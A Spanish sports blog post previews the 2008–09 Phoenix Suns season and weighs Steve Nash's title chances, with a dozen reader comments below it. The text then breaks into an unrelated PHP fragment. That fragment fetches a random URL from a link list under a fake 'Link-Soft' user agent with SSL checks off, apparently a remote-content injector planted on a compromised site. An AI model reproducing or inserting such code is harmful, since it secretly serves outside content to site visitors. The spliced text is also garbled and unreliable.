Phoenix Suns: ¿La última oportunidad para Nash?

14 de October de 2008 por arivas

Las cosas cambiaron radialmente en Arizona allá por el verano de 2004 con la llegada de Steve Nash procedente de Dallas. A partir de entonces el equipo empezó a ganar partidos y a hacer disfrutar a los aficionados, no sólo a los de Phoenix. El plan era sencillo: correr y anotar, correr y anotar. Con esta filosofía, inculcada por Mike D’Antoni desde el banquillo y ejecutada a la perfección por Nash en la cancha, consiguieron ser el equipo más atractivo de la liga y el base se convirtió en uno de los jugadores más respetados de la liga con dos MVP incluidos. Pero ¿era suficiente?

Los aficionados disfrutaban con su equipo pero querían más; todos tenían un objetivo claro: conquistar el Anillo que hasta el momento se le resiste a la franquicia. Es cierto que el equipo arrasaba en temporada regular, pero siempre se cruzaba alguna piedra en su camino: la inexperiencia del primer año, la lesión de Stoudemire en la 05-06, la polémica arbitral con San Antonio en 2007…

Las explicaciones eran diversas y la solución que buscó el cuerpo técnico quería cubrir una de las deficiencias recurrentes en todos los análisis: se necesitaba un hombre interior que dominara en la zona y aportara rebote y defensa. El elegido: Shaquille O’Neal, que fue intercambiado por Shawn Marion y Marcus Banks. Evidentemente, O’Neal no era el de sus mejores tiempos, pero se esperaba que pudiera aportar ese plus que necesitaba el equipo. Pero a las primeras de cambio y de nuevo frente a San Antonio el equipo cayó claramente en cinco partidos. La historia se repetía.

Esta temporada Nash y cía. tendrán otra oportunidad. El cambio mas significativo en la franquicia es el nuevo inquilino del banquillo. D’Antoni se marcha rumbo a NY, y su lugar lo ocupará Terry Porter, que ha pasado sus últimos años como asistente en Detroit. De él se espera que pueda inculcar ese carácter intenso y competitivo que caracteriza a Detroit y que mantenga la alegría en ataque propia de los Suns.

Nash seguirá liderando al equipo dentro de la cancha, aunque lo lógico es que se dosifique más que en temporadas anteriores para poder llegar a tope a los Playoffs. Su fiel escudero en la línea exterior seguirá siendo Raja Bell, jugador de perfil bajo pero que está ofreciendo un enorme rendimiento al equipo.

El frontcourt inicialmente estará formado por Diaw-Stoudemire-O’Neal. El francés intentará volver a llegar al nivel mostrado en la 06/07, su versatilidad será de nuevo fundamental, ocupará en muchos momentos el puesto de PF e incluso actuará como falso center ante la escasez de alternativas para el juego interior en el banquillo. Stoudemire-O’Neal será la pareja interior titular. Estamos hablando de dos superestrellas (probablemente dos de los mejores pívots de la década) aunque en diferentes momentos de sus carreras. Amare, al que tendremos que acostumbrarnos a ver jugar con gafas, se encuentra en pleno apogeo y sus números volverán a rondar los más de 25 puntos, 9 rebotes y 2 tapones que firmó la temporada pasada. En cambio, Shaq es toda una incógnita, es evidente que sus mejores tiempos pasaron, en las últimas temporadas se ha perdido demasiados partidos y sus medias han bajado notablemente, pero la duda es si aún puede ser un factor importante desde un papel secundario aportando en defensa y rebote.

En el banquillo cuentan con un importante arsenal exterior liderado por Grant Hill y L. Barbosa -mejor 6º hombre de la 2006-2007- al que se le han unido este verano Matt Barnes y algún que otro joven como A. Tucker o Dragic. En cambio el juego interior apenas cuenta con recambios y es el rookie Robin Lopez la única alternativa de peso (estrictamente hablando).

Con estas armas parece claro que la oportunidad les llegará. Si Porter da con la tecla que conjugue un mayor nivel defensivo sin perder las virtudes de los últimos años y Nash y O’Neal llegan a los Playoffs en buen estado (algo que no parce sencillo, especialmente en el caso de Shaq) Phoenix estará al nivel de los mejores. Pero si algo falla, ya saben cómo termina el cuento.

Quinteto: Steve Nash, Raja Bell, Boris Diaw, Amare Stoudemire y Shaq O’Neal.

Sexto Hombre: Leandro Barbosa.

Pronóstico: Final de Conferencia.

Comenta

12 comentarios a esta entrada

  1. Txusma dice:
    #1

    Final de conferencia? Los Suns por encima de Lakers, Spurs, Jazz, Hornets? No acabo de verlo y es que hay muchos condicionantes siendo la adaptacion al nuevo sistema y las edades de Nash y O’Neal los principales. Los veo fuera en primera o segunda ronda.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo también tengo muchas dudas. La primera es cómo cambiará el juego de los Suns sin la dirección de D’Antoni. Puede no irles mal un juego más pausado, sobre todo si aún quieren sacar algo positivo de Shaq. Pero en ese caso habría que ver cómo se adaptan Nash y Barbosa, y si Porter consigue que este equipo defienda mejor. Yo los veo en 2ª ronda de Playoffs, pero dudo que la superen.

      Citar

  3. TheDeerHunter dice:
    #3

    A priori también les doy como 2ª ronda… pero no descarto para nada que puedan llegar a la final de conferencia o incluso a la final.
    En principio los cambios que se han planteado me parecen positivos, tal y como estaban las cosas.
    Tras la gran cagada del año pasado a este equipo sólo le queda bajar revoluciones a saco, y que gente como Shaq y como Nash no lleguen rebentados a los momentos clave de la temporada.
    Shaquille (¿uno de los mejores pívots de la década??? querrás decir uno de los mejores de la historia!!!)
    ha llegado como un tiro a la pretemporada. Bajar el ritmo y jugar hombro con hombro con la otra bestia parda le va a venir que ni pintado.

    No veo a Diaw quitándole la titularidad a Grant Hill… y tampoco creo que jugará de 3 con tanta asiduidad como para considerarlo primordialmente como tal.

    Veremos como asimilan los cambios… Es un equipo perro y Porter es un tipo listo. Que nadie los de por acabados.

      Citar

  4. arivas dice:
    #4

    Yo tambien tengo muchas dudas, pero habia que mojarse jeeje.

    Habrá que ver como les va el cambio de entrenador, el momento en que llegan Nash y Shaq a los PO… es la idea que queria expresar, que tienen que coincidir mucahs cosas, pero si coinciden yo creo que estan al mimso nivel que los grandes favoritos

      Citar

  5. MagicJohnson32 dice:
    #5

    Ah, y creo que Diaw apenas jugará de 3, salvo lesiones. Intuyo que Barnes será titular y Hill juegue minutos de calidad. Diaw jugará como primera rotación interior los minutos que dejen disponibles Shaq y Amare, que serán bastantes en el caso de O’Neal.

      Citar

  6. Gallis dice:
    #6

    Ufff, pues salvo que le toquen los Rockets, jeje, no veo a estos Suns capaces de eliminar a Lakers, Hornets o SA…quizá a los Jazz, y no las tengo todas conmigo…

    Para mí el proyecto de Phoenix es un proyecto agotado, en lo que se refiere a luchar por el anillo. Creo que serán Playoff sin problemas(séptimos, no más), pero no les veo luchando por cotaas más altas. El trade Marion-Shaq, de momento solo ha servido para que el equipo esté hipotecado salarialmente 2 años en lugar de 1 y, por otro lado, los años van pesando. En eso quizá salgan ganando, porque dudo que Nash hubiera aguantado otro año al ritmo de D´Antoni…

    Pero más allá de eso no veo ningún cambio significativo en el equipo y no me ofrecen ninguna garantia…

      Citar

  7. xapa_croack dice:
    #7

    A que se debe que nash diga que o renueva su contrato o se va a toronto??? Pq nombraria a los canandienses?

      Citar

  8. Jabho dice:
    #8

    Si hay un jugador que me encantaría que ganará el anillo es Nash… Apuesto por verlos en 2ª ronda de PO y ahí depende de los cruces.

    De salir mal la cosa supongo que Nash podría tener otra oportunidad en otro equipo pero con otro rol.

      Citar

  9. Gallis dice:
    #9

    Hombre, imagino que habrá nombrado a Toronto porque, como buen canadiense, le hará ilusión jugar en su tierra…

      Citar

  10. MagicJohnson32 dice:
    #10

    A Calderón no le iría mal un suplente en condiciones, jeje.

      Citar

  11. Gallis dice:
    #11

    Ojito a la lesión de Nash de anoche…

      Citar

  12. Ivan Cortazar dice:
    #12

    JAJA, calderon no le llega ni a el ombligo a STEVE NASH

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>